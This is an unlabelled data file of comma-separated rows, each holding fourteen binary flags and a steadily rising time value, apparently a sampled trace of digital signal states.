0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5039960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5040240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5040440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5040760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5041000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5041240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5041480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5041720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5041960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5042240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5042480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5042760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5043000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5043240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5043480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5043720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5043960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5044240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6292680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6295040e-03 1,0,0,1,1,0,0,0,0,0,0,1,0,1,9.6295320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6295600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,9.6298520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6298800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,9.6299040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6299280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,9.6299560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6299800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,9.6300040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6300280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,9.6300520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.6300760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6301000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6301040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6301280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6301560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6301800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6302040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6302280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6302520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6302760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6303040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6303280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6303560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6303800e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6304040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6304280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6304520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6304760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6305000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6305240e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6305520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6305760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6306040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6306280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6306520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6306760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6307000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6307240e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6307520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6307760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6308040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6308280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6308520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6308760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6309000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6309240e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6309520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6309760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6310040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6310280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6310520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6310760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6311000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6311240e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6311320e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,9.6311800e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6312040e-03 1,0,0,1,1,1,0,0,0,0,0,0,0,0,9.6312080e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6312120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6312280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6312520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6312760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6313000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6313240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6313520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6313760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6314040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6314280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6314520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6315000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6315240e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6315320e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,9.6315520e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6315760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6315840e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6316040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6316280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6316520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6316760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6317000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6317240e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6317520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6317760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6318040e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6318280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6318520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6318760e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6319000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6319240e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6319520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6319760e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6319800e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,9.6320280e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6320520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6320600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6320760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6321000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6321240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6321520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6321760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6322040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6322280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6322520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6322760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6323000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6323240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6323520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6323760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6324040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6324280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6324520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6325000e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6325240e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6325320e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,9.6325520e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6325760e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,9.6326280e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,9.6326520e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6326600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6326760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6327000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6327240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6327520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6327760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6328040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6328280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6328520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6328760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6329000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6329240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6329520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6329760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6330040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6330280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6330520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6330760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6331000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6331240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6331520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6331760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6332040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6332280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6332520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6332760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6333000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6333240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6333520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6333760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6334040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6334280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6334520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6334760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6335000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6335240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6335520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6335760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6336040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6336280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6336520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6336760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6337000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6337240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6337520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6337760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6338040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6338280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6338520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6338800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6339040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6339280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6339560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6339800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6340040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6340280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6340520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6340760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6341040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6341280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6341560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6341800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6342040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6342280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6342520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6342760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6343040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6343280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6343560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6343800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6344040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6344280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6344520e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6344760e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6345040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6345280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6345560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6345800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6346040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6346280e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6346600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6346840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6347080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6347320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6347560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6347800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6348040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6348320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6348560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6348840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6349080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6349320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6349560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6349800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6350040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6350320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6350560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6350840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6351080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6351320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6351560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6351800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6352040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6352320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6352560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6352840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6353080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6353320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6353560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6353800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6354040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6354320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6354560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6354840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6355080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6355320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6355560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6355800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6356040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6356320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6356560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6356840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6357080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6357320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6357560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6357800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6358040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6358320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6358560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6358840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6359080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6359320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6359560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6359800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6360040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6360320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6360560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6360840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6361080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6361320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6361560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6361800e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6362040e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6362320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6362560e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6362840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6363080e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,9.6363320e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,9.6363560e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,9.7611720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.7613400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.7613600e-03 0,1,0,1,1,0,0,0,0,0,0,1,0,1,9.7613800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.7614000e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,9.7616840e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.7617080e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,9.7617560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.7617800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,9.7618040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.7618280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,9.7618520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.7618800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,9.7619040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.7619320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,9.7619800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7620040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7620280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7620520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7621080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7621320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7621560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7621800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7622040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7622280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7622520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7622800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7623040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7623280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7623800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7624040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7624280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7624520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7625040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7625320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7625560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7625800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7626280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7626520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7627040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7627320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7627800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7628040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7628280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7628520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7628760e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7629040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7629320e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7629560e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7630040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7630280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7630800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7631040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7631560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7631800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7632040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7632280e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7632360e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,9.7632800e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7633040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7633120e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7633320e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7633560e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7633800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7634040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7634280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7634520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7634760e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7635000e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7635520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7635760e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7635800e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,9.7636040e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7636280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7636360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7636520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7636760e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7637000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7637240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7637800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7638040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7638280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7638520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7639000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7639240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7639800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7640040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7640520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7640760e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7641000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7641240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7641520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7641760e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7641800e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,9.7642280e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7642520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7642600e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7642760e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7643000e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7643520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7643760e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7644280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7644520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7645040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7645320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7645560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7645800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7646040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7646280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7646520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7646800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7647320e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7647560e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7647600e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,9.7647800e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7648040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7648120e-03 